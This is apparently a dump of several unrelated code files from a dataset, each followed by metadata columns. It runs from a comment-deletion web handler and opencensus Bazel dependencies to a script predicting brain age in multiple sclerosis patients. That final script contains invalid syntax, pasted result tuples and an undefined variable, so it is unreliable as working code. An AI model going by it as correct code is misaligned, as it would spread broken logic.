raise HTTP_404('trx not found')
success, _ = RepoArchives.instance().delComments(
archivePath="%s/%s" % (testPath, trName))
if success != Context.instance().CODE_OK:
raise HTTP_500("Unable to delete all comments")
return {"cmd": self.request.path,
'test-id': testId,
'project-id': projectId,
"message": "all comments deleted"}
| 34.150892
| 126
| 0.495377
| 25,282
| 298,752
| 5.782889
| 0.034056
| 0.035512
| 0.032215
| 0.03792
| 0.882403
| 0.870269
| 0.857869
| 0.84252
| 0.821878
| 0.811057
| 0
| 0.016827
| 0.421534
| 298,752
| 8,747
| 127
| 34.154796
| 0.829167
| 0.342886
| 0
| 0.832867
| 0
| 0
| 0.151193
| 0.000663
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025474
| false
| 0.000311
| 0.00466
| 0.000311
| 0.081702
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
df5fbc226d62b9c3411f3eb3cacc6640eb234437
| 361
|
py
|
Python
|
src/graph_transpiler/webdnn/backend/webgl/optimize_rules/simplify_channel_mode_conversion/__init__.py
|
steerapi/webdnn
|
1df51cc094e5a528cfd3452c264905708eadb491
|
[
"MIT"
] | 1
|
2021-04-09T15:55:35.000Z
|
2021-04-09T15:55:35.000Z
|
src/graph_transpiler/webdnn/backend/webgl/optimize_rules/simplify_channel_mode_conversion/__init__.py
|
steerapi/webdnn
|
1df51cc094e5a528cfd3452c264905708eadb491
|
[
"MIT"
] | null | null | null |
src/graph_transpiler/webdnn/backend/webgl/optimize_rules/simplify_channel_mode_conversion/__init__.py
|
steerapi/webdnn
|
1df51cc094e5a528cfd3452c264905708eadb491
|
[
"MIT"
] | null | null | null |
from webdnn.backend.webgl.optimize_rules.simplify_channel_mode_conversion import simplify_channel_mode_conversion
from webdnn.backend.webgl.optimize_rules.simplify_channel_mode_conversion import simplify_nonsense_channel_mode_conversion
from webdnn.backend.webgl.optimize_rules.simplify_channel_mode_conversion import simplify_redundant_channel_mode_conversion
| 90.25
| 123
| 0.933518
| 47
| 361
| 6.680851
| 0.276596
| 0.210191
| 0.401274
| 0.369427
| 0.878981
| 0.878981
| 0.878981
| 0.878981
| 0.878981
| 0.878981
| 0
| 0
| 0.033241
| 361
| 3
| 124
| 120.333333
| 0.899713
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 13
|
df78c3734cc4124f814f44db802924c18621bc52
| 36
|
py
|
Python
|
tests/test_pycounts_al.py
|
adrianne-l/pycounts_al
|
88ff10870bf95b8690a9b73c58826505f71fa56b
|
[
"MIT"
] | null | null | null |
tests/test_pycounts_al.py
|
adrianne-l/pycounts_al
|
88ff10870bf95b8690a9b73c58826505f71fa56b
|
[
"MIT"
] | null | null | null |
tests/test_pycounts_al.py
|
adrianne-l/pycounts_al
|
88ff10870bf95b8690a9b73c58826505f71fa56b
|
[
"MIT"
] | null | null | null |
from pycounts_al import pycounts_al
| 18
| 35
| 0.888889
| 6
| 36
| 5
| 0.666667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 36
| 1
| 36
| 36
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
10c7d6e1a790de064d459cacb08bfd0c3428037d
| 141
|
py
|
Python
|
fashion_intel/fashion2vec/__init__.py
|
oke-aditya/fashion_intel
|
dfd468d52e6565fe371be84ffb021123578b9c41
|
[
"Apache-2.0"
] | 1
|
2021-05-08T10:33:02.000Z
|
2021-05-08T10:33:02.000Z
|
fashion_intel/fashion2vec/__init__.py
|
oke-aditya/fashion_intel
|
dfd468d52e6565fe371be84ffb021123578b9c41
|
[
"Apache-2.0"
] | 18
|
2020-08-07T10:28:44.000Z
|
2020-10-01T20:06:30.000Z
|
fashion_intel/fashion2vec/__init__.py
|
oke-aditya/fashion_intel
|
dfd468d52e6565fe371be84ffb021123578b9c41
|
[
"Apache-2.0"
] | 2
|
2020-08-07T12:28:38.000Z
|
2020-08-07T18:11:42.000Z
|
from fashion_intel.fashion2vec.engine import *
from fashion_intel.fashion2vec.model import *
from fashion_intel.fashion2vec.dataset import *
| 35.25
| 47
| 0.851064
| 18
| 141
| 6.5
| 0.444444
| 0.282051
| 0.410256
| 0.692308
| 0.564103
| 0
| 0
| 0
| 0
| 0
| 0
| 0.023256
| 0.085106
| 141
| 3
| 48
| 47
| 0.883721
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
80596a86db365c39b5981abd355793b82249075d
| 8,303
|
bzl
|
Python
|
examples/opencensus_workspace.bzl
|
SergeyKanzhelev/opencensus-java
|
e45afa14e204ef3800cf7c89ae91fc23e6ae49ef
|
[
"Apache-2.0"
] | null | null | null |
examples/opencensus_workspace.bzl
|
SergeyKanzhelev/opencensus-java
|
e45afa14e204ef3800cf7c89ae91fc23e6ae49ef
|
[
"Apache-2.0"
] | null | null | null |
examples/opencensus_workspace.bzl
|
SergeyKanzhelev/opencensus-java
|
e45afa14e204ef3800cf7c89ae91fc23e6ae49ef
|
[
"Apache-2.0"
] | null | null | null |
# The following dependencies were calculated from:
#
# generate_workspace --artifact=io.opencensus:opencensus-api:0.12.2 --artifact=io.opencensus:opencensus-contrib-zpages:0.12.2 --artifact=io.opencensus:opencensus-exporter-trace-logging:0.12.2 --artifact=io.opencensus:opencensus-impl:0.12.2 --repositories=http://repo.maven.apache.org/maven2
def opencensus_maven_jars():
# io.opencensus:opencensus-impl-core:jar:0.12.2 got requested version
# io.opencensus:opencensus-contrib-zpages:jar:0.12.2 got requested version
# io.opencensus:opencensus-contrib-grpc-metrics:jar:0.12.2 got requested version
# io.opencensus:opencensus-api:jar:0.12.2
# io.opencensus:opencensus-exporter-trace-logging:jar:0.12.2 got requested version
# io.opencensus:opencensus-impl:jar:0.12.2 got requested version
native.maven_jar(
name = "com_google_code_findbugs_jsr305",
artifact = "com.google.code.findbugs:jsr305:3.0.1",
repository = "http://repo.maven.apache.org/maven2/",
sha1 = "f7be08ec23c21485b9b5a1cf1654c2ec8c58168d",
)
# io.opencensus:opencensus-api:jar:0.12.2
native.maven_jar(
name = "io_grpc_grpc_context",
artifact = "io.grpc:grpc-context:1.9.0",
repository = "http://repo.maven.apache.org/maven2/",
sha1 = "28b0836f48c9705abf73829bbc536dba29a1329a",
)
native.maven_jar(
name = "io_opencensus_opencensus_exporter_trace_logging",
artifact = "io.opencensus:opencensus-exporter-trace-logging:0.12.2",
repository = "http://repo.maven.apache.org/maven2/",
sha1 = "15b8b3d2c9b3ffd2d8e242d252ee056a1c30d203",
)
# io.opencensus:opencensus-impl-core:jar:0.12.2 got requested version
# io.opencensus:opencensus-contrib-zpages:jar:0.12.2 got requested version
# io.opencensus:opencensus-contrib-grpc-metrics:jar:0.12.2 got requested version
# io.opencensus:opencensus-api:jar:0.12.2
# io.opencensus:opencensus-exporter-trace-logging:jar:0.12.2 got requested version
# io.opencensus:opencensus-impl:jar:0.12.2 got requested version
native.maven_jar(
name = "com_google_errorprone_error_prone_annotations",
artifact = "com.google.errorprone:error_prone_annotations:2.2.0",
repository = "http://repo.maven.apache.org/maven2/",
sha1 = "88e3c593e9b3586e1c6177f89267da6fc6986f0c",
)
native.maven_jar(
name = "io_opencensus_opencensus_contrib_zpages",
artifact = "io.opencensus:opencensus-contrib-zpages:0.12.2",
repository = "http://repo.maven.apache.org/maven2/",
sha1 = "44f8d5b81b20f9f0d34091baecffd67c2ce0c952",
)
# io.opencensus:opencensus-impl:jar:0.12.2
native.maven_jar(
name = "com_lmax_disruptor",
artifact = "com.lmax:disruptor:3.3.9",
repository = "http://repo.maven.apache.org/maven2/",
sha1 = "7898f8e8dc2d908d4ae5240fbb17eb1a9c213b9b",
)
# io.opencensus:opencensus-impl-core:jar:0.12.2 got requested version
# io.opencensus:opencensus-contrib-zpages:jar:0.12.2 got requested version
# io.opencensus:opencensus-api:jar:0.12.2
# io.opencensus:opencensus-exporter-trace-logging:jar:0.12.2 got requested version
native.maven_jar(
name = "com_google_guava_guava",
artifact = "com.google.guava:guava:19.0",
repository = "http://repo.maven.apache.org/maven2/",
sha1 = "6ce200f6b23222af3d8abb6b6459e6c44f4bb0e9",
)
# io.opencensus:opencensus-contrib-zpages:jar:0.12.2
native.maven_jar(
name = "io_opencensus_opencensus_contrib_grpc_metrics",
artifact = "io.opencensus:opencensus-contrib-grpc-metrics:0.12.2",
repository = "http://repo.maven.apache.org/maven2/",
sha1 = "20dd982bd8942fc6d612fedd4466cda0461267ec",
)
# io.opencensus:opencensus-impl-core:jar:0.12.2 got requested version
# io.opencensus:opencensus-contrib-zpages:jar:0.12.2 got requested version
# io.opencensus:opencensus-contrib-grpc-metrics:jar:0.12.2 got requested version
# io.opencensus:opencensus-exporter-trace-logging:jar:0.12.2 got requested version
# io.opencensus:opencensus-impl:jar:0.12.2 got requested version
native.maven_jar(
name = "io_opencensus_opencensus_api",
artifact = "io.opencensus:opencensus-api:0.12.2",
repository = "http://repo.maven.apache.org/maven2/",
sha1 = "a2d524b62869350942106ab8f9a1f5adb1212775",
)
# io.opencensus:opencensus-impl:jar:0.12.2
native.maven_jar(
name = "io_opencensus_opencensus_impl_core",
artifact = "io.opencensus:opencensus-impl-core:0.12.2",
repository = "http://repo.maven.apache.org/maven2/",
sha1 = "9e059704131a4455b3bd6d84cfa8e6875551d647",
)
native.maven_jar(
name = "io_opencensus_opencensus_impl",
artifact = "io.opencensus:opencensus-impl:0.12.2",
repository = "http://repo.maven.apache.org/maven2/",
sha1 = "4e5cd57bddbd9b47cd16cc8b0b608b43355b223f",
)
def opencensus_java_libraries():
native.java_library(
name = "com_google_code_findbugs_jsr305",
visibility = ["//visibility:public"],
exports = ["@com_google_code_findbugs_jsr305//jar"],
)
native.java_library(
name = "io_grpc_grpc_context",
visibility = ["//visibility:public"],
exports = ["@io_grpc_grpc_context//jar"],
)
native.java_library(
name = "io_opencensus_opencensus_exporter_trace_logging",
visibility = ["//visibility:public"],
exports = ["@io_opencensus_opencensus_exporter_trace_logging//jar"],
runtime_deps = [
":com_google_code_findbugs_jsr305",
":com_google_errorprone_error_prone_annotations",
":com_google_guava_guava",
":io_opencensus_opencensus_api",
],
)
native.java_library(
name = "com_google_errorprone_error_prone_annotations",
visibility = ["//visibility:public"],
exports = ["@com_google_errorprone_error_prone_annotations//jar"],
)
native.java_library(
name = "io_opencensus_opencensus_contrib_zpages",
visibility = ["//visibility:public"],
exports = ["@io_opencensus_opencensus_contrib_zpages//jar"],
runtime_deps = [
":com_google_code_findbugs_jsr305",
":com_google_errorprone_error_prone_annotations",
":com_google_guava_guava",
":io_opencensus_opencensus_api",
":io_opencensus_opencensus_contrib_grpc_metrics",
],
)
native.java_library(
name = "com_lmax_disruptor",
visibility = ["//visibility:public"],
exports = ["@com_lmax_disruptor//jar"],
)
native.java_library(
name = "com_google_guava_guava",
visibility = ["//visibility:public"],
exports = ["@com_google_guava_guava//jar"],
)
native.java_library(
name = "io_opencensus_opencensus_contrib_grpc_metrics",
visibility = ["//visibility:public"],
exports = ["@io_opencensus_opencensus_contrib_grpc_metrics//jar"],
runtime_deps = [
":com_google_code_findbugs_jsr305",
":com_google_errorprone_error_prone_annotations",
":io_opencensus_opencensus_api",
],
)
native.java_library(
name = "io_opencensus_opencensus_api",
visibility = ["//visibility:public"],
exports = ["@io_opencensus_opencensus_api//jar"],
runtime_deps = [
":com_google_code_findbugs_jsr305",
":com_google_errorprone_error_prone_annotations",
":com_google_guava_guava",
":io_grpc_grpc_context",
],
)
native.java_library(
name = "io_opencensus_opencensus_impl_core",
visibility = ["//visibility:public"],
exports = ["@io_opencensus_opencensus_impl_core//jar"],
runtime_deps = [
":com_google_code_findbugs_jsr305",
":com_google_errorprone_error_prone_annotations",
":com_google_guava_guava",
":io_opencensus_opencensus_api",
],
)
native.java_library(
name = "io_opencensus_opencensus_impl",
visibility = ["//visibility:public"],
exports = ["@io_opencensus_opencensus_impl//jar"],
runtime_deps = [
":com_google_code_findbugs_jsr305",
":com_google_errorprone_error_prone_annotations",
":com_google_guava_guava",
":com_lmax_disruptor",
":io_opencensus_opencensus_api",
":io_opencensus_opencensus_impl_core",
],
)
| 34.886555
| 290
| 0.701192
| 964
| 8,303
| 5.773859
| 0.079876
| 0.129357
| 0.237154
| 0.031441
| 0.863816
| 0.817284
| 0.73913
| 0.666367
| 0.542041
| 0.472512
| 0
| 0.069964
| 0.171986
| 8,303
| 237
| 291
| 35.033755
| 0.739636
| 0.234132
| 0
| 0.621118
| 1
| 0
| 0.54725
| 0.436631
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012422
| true
| 0
| 0
| 0
| 0.012422
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
338f5d084956fc09203ab5a55ae7b666e1d11461
| 15,270
|
py
|
Python
|
src/review_1_cercor/2_ms_no_lesions.py
|
MezerLab/age-pred-r1
|
5e72fa3ede6306f779a262ded4e2c10d932df038
|
[
"Apache-2.0"
] | null | null | null |
src/review_1_cercor/2_ms_no_lesions.py
|
MezerLab/age-pred-r1
|
5e72fa3ede6306f779a262ded4e2c10d932df038
|
[
"Apache-2.0"
] | null | null | null |
src/review_1_cercor/2_ms_no_lesions.py
|
MezerLab/age-pred-r1
|
5e72fa3ede6306f779a262ded4e2c10d932df038
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 11 09:31:43 2019
@author: asier.erramuzpe
"""
import numpy as np
from src.data.make_dataset import (load_cort,
load_dataset,
load_cort_areas,
)
from sklearn.decomposition import PCA
from sklearn import linear_model
from sklearn.model_selection import (GridSearchCV,
train_test_split,
)
from sklearn import metrics
from scipy.stats import ttest_ind
import seaborn as sns
import matplotlib.pyplot as plt
areas = load_cort_areas()
AGE = 25
NUM_AREAS = 148
areas_notdeg2_idx = [ 0, 1, 4, 5, 11, 12, 13, 17, 20, 21, 22, 23, 30, 31, 33,
34, 36, 38, 41, 42, 46, 47, 49, 61, 62, 63, 69, 71, 74,
75, 79, 94, 95, 96, 97, 104, 105, 108, 115, 116, 120, 136, 137,
143]
areas_notdeg2 = np.zeros(NUM_AREAS)
areas_notdeg2[areas_notdeg2_idx] = 1
"""
R1 - ElasticNet
"""
data_t1, y_t1, subs_t1 = load_cort(measure = 'r1', cort='midgray')
dataset = 'stanford_ms_run1'
cortical_mat_ms1_t1, age_ms1, subs, _ = load_dataset(dataset, cortical_parc='midgray',
measure_type='r1')
dataset = 'stanford_ms_run2'
cortical_mat_ms2_t1, age_ms2, subs, _ = load_dataset(dataset, cortical_parc='midgray',
measure_type='r1')
NUM_REPS = 1000
X = data_t1.T
youngsters = np.where(y_t1<=AGE)
y_old = np.delete(y_t1, youngsters)
data_old = np.delete(X, youngsters, axis=0)
data_old = np.delete(data_old, np.where(areas_notdeg2==1), axis=1)
#df_pca, X_pca, pca_evr, df_corr, df_n, df_na, df_nabv, df_rank = pca_full_report(X=data_old, features_=np.delete(areas, np.where(areas_notdeg2==1)), save_plot=False, fig_dpi=50)
adults = np.where(y_t1>AGE)
y_young = np.delete(y_t1, adults)
data_young = np.delete(X, adults, axis=0)
data_young = np.delete(data_young, np.where(areas_notdeg2==1), axis=1)
#df_pca, X_pca, pca_evr, df_corr, df_n, df_na, df_nabv, df_rank = pca_full_report(X=data_young, features_=np.delete(areas, np.where(areas_notdeg2==1)), save_plot=False, fig_dpi=50)
#prepare a range of parameters to test
alphas = np.array([1,])
l1_ratio=np.array([0.9])
#create and fit a ridge regression model, testing each alpha
model = linear_model.ElasticNet() #We have chosen to just normalize the data by default, you could GridsearchCV this is you wanted
grid = GridSearchCV(estimator=model, param_grid=dict(alpha=alphas, l1_ratio=l1_ratio))
grid.fit(data_old, y_old)
# summarize the results of the grid search
# we want 30 features
grid.best_estimator_.alpha=0.01
grid.best_estimator_.l1_ratio=0.9999
lm = linear_model.ElasticNet(alpha=grid.best_estimator_.alpha, l1_ratio=grid.best_estimator_.l1_ratio)
error_old = np.zeros(NUM_REPS)
error_old_lim = np.zeros(NUM_REPS)
error_old_tot = np.empty((data_old.shape[0],NUM_REPS))
error_old_tot[:] = np.nan
indices = np.arange(data_old.shape[0])
for idx in range(NUM_REPS):
X_train, X_test, y_train, y_test_old, idx1, idx2 = train_test_split(data_old, y_old, indices)
lm.fit(X_train, y_train)
y_pred = lm.predict(X_test)
error_old[idx] = metrics.mean_absolute_error(y_test_old, y_pred)
error_old_tot[idx2,idx] = y_pred
error_old_lim[idx] = np.mean(y_test_old - y_pred)
mean_pred_old = np.nanmean(error_old_tot, axis=1)
np.mean(error_old)
#print(np.count_nonzero(lm.coef_))
#
#plt.scatter(mean_pred_old, y_old)
#plt.plot(range(15,100),range(15,100))
#plt.xlabel("predicted age")
#plt.ylabel("real age")
cortical_mat_ms1_t1 = np.delete(cortical_mat_ms1_t1, np.where(areas_notdeg2==1), axis=0)
cortical_mat_ms2_t1 = np.delete(cortical_mat_ms2_t1, np.where(areas_notdeg2==1), axis=0)
error_ms = np.zeros(NUM_REPS)
error_ms_lim = np.zeros(NUM_REPS)
error_ms1_tot = np.empty((cortical_mat_ms1_t1.shape[1],NUM_REPS))
error_ms1_tot[:] = np.nan
error_ms2_tot = np.empty((cortical_mat_ms2_t1.shape[1],NUM_REPS))
error_ms2_tot[:] = np.nan
indices = np.arange(cortical_mat_ms1_t1.shape[1])
for idx in range(NUM_REPS):
X_train, X_test, y_train, y_test = train_test_split(data_old, y_old)
lm.fit(X_train, y_train)
y_pred_ms1 = lm.predict(cortical_mat_ms1_t1.T)
y_pred_ms2 = lm.predict(cortical_mat_ms2_t1.T)
error_ms[idx] = np.mean((metrics.mean_absolute_error(y_pred_ms1, age_ms1), metrics.mean_absolute_error(y_pred_ms2, age_ms2)))
error_ms_lim[idx] = np.mean((np.mean(y_pred_ms1 - age_ms1), np.mean(y_pred_ms2 - age_ms2)))
error_ms1_tot[:,idx] = y_pred_ms1
error_ms2_tot[:,idx] = y_pred_ms2
mean_pred_ms1 = np.nanmean(error_ms1_tot, axis=1)
mean_pred_ms2 = np.nanmean(error_ms2_tot, axis=1)
np.mean(error_ms)
# we want 28 features
# we want 27 features without reading
grid.best_estimator_.alpha=0.0055
grid.best_estimator_.l1_ratio=0.999
lm = linear_model.ElasticNet(alpha=grid.best_estimator_.alpha, l1_ratio=grid.best_estimator_.l1_ratio)
error_young = np.zeros(NUM_REPS)
error_young_lim = np.zeros(NUM_REPS)
error_young_tot = np.empty((data_young.shape[0],NUM_REPS))
error_young_tot[:] = np.nan
indices = np.arange(data_young.shape[0])
for idx in range(NUM_REPS):
X_train, X_test, y_train, y_test_young, idx1, idx2 = train_test_split(data_young, y_young, indices)
lm.fit(X_train, y_train)
y_pred = lm.predict(X_test)
error_young[idx] = metrics.mean_absolute_error(y_test_young, y_pred)
error_young_lim[idx] = np.mean(y_test_young - y_pred)
error_young_tot[idx2,idx] = y_pred
mean_pred_young = np.nanmean(error_young_tot, axis=1)
#print(np.mean(error_young))
#print(np.count_nonzero(lm.coef_))
#
#plt.scatter(mean_pred_young, y_young)
#plt.plot(range(15,100),range(15,100))
#plt.xlabel("predicted age")
#plt.ylabel("real age")
plt.scatter(mean_pred_old, y_old)
plt.plot(range(15,100),range(15,100))
plt.xlabel("predicted age")
plt.ylabel("real age")
plt.scatter(np.hstack((mean_pred_ms1)), np.hstack((age_ms1)))
plt.plot(range(15,100),range(15,100))
plt.xlabel("predicted age")
plt.ylabel("real age ms")
plt.title("Age prediction ElasticNet")
plt.scatter(mean_pred_young, y_young)
plt.plot(range(15,100),range(15,100))
plt.xlabel("predicted age")
plt.ylabel("real age")
plt.scatter(np.hstack(( mean_pred_ms2)), np.hstack(( age_ms2)), c='orange', edgecolors='k')
plt.plot(range(15,100),range(15,100))
plt.xlabel("predicted age")
plt.ylabel("real age ms")
plt.xlim(0,100)
plt.title("Age prediction ElasticNet R1")
plt.savefig('./reports/figures/rebuttal/ms_no_lesions//R1_elastic_net25_mean.eps', format='eps')
sns.distplot(error_young, color='green', label="Young")
sns.distplot(error_old, color='blue', label="Adult")
sns.distplot(error_ms, color='orange', label="MS")
plt.legend()
plt.ylim(0,1.5)
plt.xlim(0,16)
plt.savefig('./reports/figures/rebuttal/ms_no_lesions/R1_en_errordist_abs.svg', format='svg')
plt.close()
sns.distplot(error_young_lim, color='green', label="Young")
sns.distplot(error_old_lim, color='blue', label="Adult")
sns.distplot(error_ms_lim, color='orange', label="MS")
plt.legend()
plt.ylim(0,0.7)
plt.xlim(-7.5,12.5)
plt.savefig('./reports/figures/rebuttal/ms_no_lesions//R1_en_errordist.svg', format='svg')
plt.close()
np.mean(error_young), np.mean(error_old), np.mean(error_ms), np.mean(error_young_lim), np.mean(error_old_lim), np.mean(error_ms_lim)
(3.8088678955607644,
9.922678403744369,
11.746312199338734,
-0.10584176177057543,
0.8343678259753887,
7.079538257465861)
error_young_en_r1 = mean_pred_young - y_young
error_old_en_r1 = mean_pred_old - y_old
error_ms_en_r1_1 = mean_pred_ms1
error_ms_en_r1_2 = mean_pred_ms2
"""
PCA
"""
"""
R1
"""
data_t1, y_t1, subs_t1 = load_cort(measure = 'r1', cort='midgray')
dataset = 'stanford_ms_run1'
cortical_mat_ms1_t1, age_ms1, subs, _ = load_dataset(dataset, cortical_parc='midgray',
measure_type='r1')
dataset = 'stanford_ms_run2'
cortical_mat_ms2_t1, age_ms2, subs, _ = load_dataset(dataset, cortical_parc='midgray',
measure_type='r1')
NUM_REPS = 1000
X = data_t1.T
youngsters = np.where(y_t1<=AGE)
y_old = np.delete(y_t1, youngsters)
data_old = np.delete(X, youngsters, axis=0)
data_old = np.delete(data_old, np.where(areas_notdeg2==1), axis=1)
#df_pca, X_pca, pca_evr, df_corr, df_n, df_na, df_nabv, df_rank = pca_full_report(X=data_old, features_=np.delete(areas, np.where(areas_notdeg2==1)), save_plot=False, fig_dpi=50)
adults = np.where(y_t1>AGE)
y_young = np.delete(y_t1, adults)
data_young = np.delete(X, adults, axis=0)
data_young = np.delete(data_young, np.where(areas_notdeg2==1), axis=1)
#df_pca, X_pca, pca_evr, df_corr, df_n, df_na, df_nabv, df_rank = pca_full_report(X=data_young, features_=np.delete(areas, np.where(areas_notdeg2==1)), save_plot=False, fig_dpi=50)
NUM_PCS = 30 # pca_idx
pca = PCA(n_components=NUM_PCS)
lm = linear_model.LinearRegression()
error_old = np.zeros(NUM_REPS)
error_old_lim = np.zeros(NUM_REPS)
error_old_tot = np.empty((data_old.shape[0], NUM_REPS))
error_old_tot[:] = np.nan
indices = np.arange(data_old.shape[0])
for idx in range(NUM_REPS):
X_train, X_test, y_train, y_test_old, idx1, idx2 = train_test_split(data_old, y_old, indices)
X_train_pca = pca.fit_transform(X_train)
X_test_pca = pca.transform(X_test)
lm.fit(X_train_pca, y_train)
y_pred = lm.predict(X_test_pca)
error_old[idx] = metrics.mean_absolute_error(y_test_old, y_pred)
error_old_lim[idx] = np.mean(y_test_old - y_pred)
error_old_tot[idx2,idx] = y_pred
mean_pred_old = np.nanmean(error_old_tot, axis=1)
np.mean(error_old)
X_ms1 = cortical_mat_ms1_t1.T
X_ms2 = cortical_mat_ms2_t1.T
X_ms1 = np.delete(X_ms1, np.where(areas_notdeg2==1), axis=1)
X_ms2 = np.delete(X_ms2, np.where(areas_notdeg2==1), axis=1)
error_ms = np.zeros(NUM_REPS)
error_ms_lim = np.zeros(NUM_REPS)
error_ms1_tot = np.empty((10, NUM_REPS))
error_ms1_tot[:] = np.nan
error_ms2_tot = np.empty((10, NUM_REPS))
error_ms2_tot[:] = np.nan
indices = np.arange(cortical_mat_ms1_t1.shape[0])
for idx in range(NUM_REPS):
X_train, X_test, y_train, y_test_old = train_test_split(data_old, y_old)
X_train_pca = pca.fit_transform(X_train)
X_test_pca_ms1 = pca.transform(X_ms1)
X_test_pca_ms2 = pca.transform(X_ms2)
lm.fit(X_train_pca, y_train)
y_pred_ms1 = lm.predict(X_test_pca_ms1)
y_pred_ms2 = lm.predict(X_test_pca_ms2)
error_ms[idx] = np.mean((metrics.mean_absolute_error(y_pred_ms1, age_ms1), metrics.mean_absolute_error(y_pred_ms2, age_ms2)))
error_ms_lim[idx] = np.mean((np.mean(y_pred_ms1 - age_ms1), np.mean(y_pred_ms2 - age_ms2)))
error_ms1_tot[:,idx] = y_pred_ms1
error_ms2_tot[:,idx] = y_pred_ms2
mean_pred_ms1 = np.nanmean(error_ms1_tot, axis=1)
mean_pred_ms2 = np.nanmean(error_ms2_tot, axis=1)
np.mean(error_ms)
# we want 27 features without reading
NUM_PCS = 27 # pca_idx
pca = PCA(n_components=NUM_PCS)
error_young = np.zeros(NUM_REPS)
error_young_lim = np.zeros(NUM_REPS)
error_young_tot = np.empty((data_young.shape[0], NUM_REPS))
error_young_tot[:] = np.nan
indices = np.arange(data_young.shape[0])
for idx in range(NUM_REPS):
X_train, X_test, y_train, y_test_young, idx1, idx2 = train_test_split(data_young, y_young, indices)
X_train_pca = pca.fit_transform(X_train)
X_test_pca = pca.transform(X_test)
lm.fit(X_train_pca, y_train)
y_pred = lm.predict(X_test_pca)
error_young[idx] = metrics.mean_absolute_error(y_test_young, y_pred)
error_young_lim[idx] = np.mean(y_test_young - y_pred)
error_young_tot[idx2,idx] = y_pred
mean_pred_young = np.nanmean(error_young_tot, axis=1)
np.mean(error_young)
plt.scatter(mean_pred_old, y_old)
plt.plot(range(15,100),range(15,100))
plt.xlabel("predicted age")
plt.ylabel("real age")
plt.scatter(np.hstack((mean_pred_ms1)), np.hstack((age_ms1)))
plt.plot(range(15,100),range(15,100))
plt.xlabel("predicted age")
plt.ylabel("real age ms")
plt.scatter(mean_pred_young, y_young)
plt.plot(range(15,100),range(15,100))
plt.xlabel("predicted age")
plt.ylabel("real age")
plt.scatter(np.hstack(( mean_pred_ms2)), np.hstack(( age_ms2)), c='orange', edgecolors='k')
plt.plot(range(15,100),range(15,100))
plt.xlabel("predicted age")
plt.ylabel("real age ms")
plt.xlim(0,100)
plt.title("Age prediction PCA R1")
plt.savefig('./reports/figures/rebuttal/ms_no_lesions//R1_pca25_mean.eps', format='eps')
plt.close()
sns.distplot(error_young, color='green', label="Young")
sns.distplot(error_old, color='blue', label="Adult")
sns.distplot(error_ms, color='orange', label="MS")
plt.legend()
plt.ylim(0,1.5)
plt.xlim(0,16)
plt.savefig('./reports/figures/rebuttal/ms_no_lesions//R1_pca_errordist_abs.svg', format='svg')
plt.close()
sns.distplot(error_young_lim, color='green', label="Young")
sns.distplot(error_old_lim, color='blue', label="Adult")
sns.distplot(error_ms_lim, color='orange', label="MS")
plt.legend()
plt.ylim(0,0.7)
plt.xlim(-7.5,15)
plt.savefig('./reports/figures/rebuttal/ms_no_lesions//R1_pca_errordist.svg', format='svg')
plt.close()
np.mean(error_young), np.mean(error_old), np.mean(error_ms), np.mean(error_young_lim), np.mean(error_old_lim), np.mean(error_ms_lim)
(3.9012972628040763,
9.596348494134515,
11.718228063461774,
-0.015885939316919354,
0.5549219781979086,
7.7544336037910035)
error_young_pca_r1 = mean_pred_young - y_young
error_old_pca_r1 = mean_pred_old - y_old
error_ms_pca_r1_1 = mean_pred_ms1
error_ms_pca_r1_2 = mean_pred_ms2
""""
statistics
""""
from scipy.stats import ttest_ind
y_ms_1 = age_ms1
y_ms_2 = age_ms2
"""
ms stats
"""
# error_old_pca_r1[idx_healthy_old_ms]
t, p = ttest_ind(error_old_pca_r1[idx_healthy_old_ms_1], error_ms_pca_r1_1 - y_ms_1) # np.delete(error_ms_pca_r1_1, [1,4]) - np.delete(y_ms_1, [1,4]) # removing outliers, still significant
sns.boxplot(data=[error_old_pca_r1[idx_healthy_old_ms_1] , error_ms_pca_r1_1 - y_ms_1], color='orange')
plt.savefig('./reports/figures/rebuttal/ms_no_lesions//old_r1_ms1_stats_pca_' + str(p) + '.svg', format='svg')
plt.close()
# error_old_pca_r1[idx_healthy_old_ms]
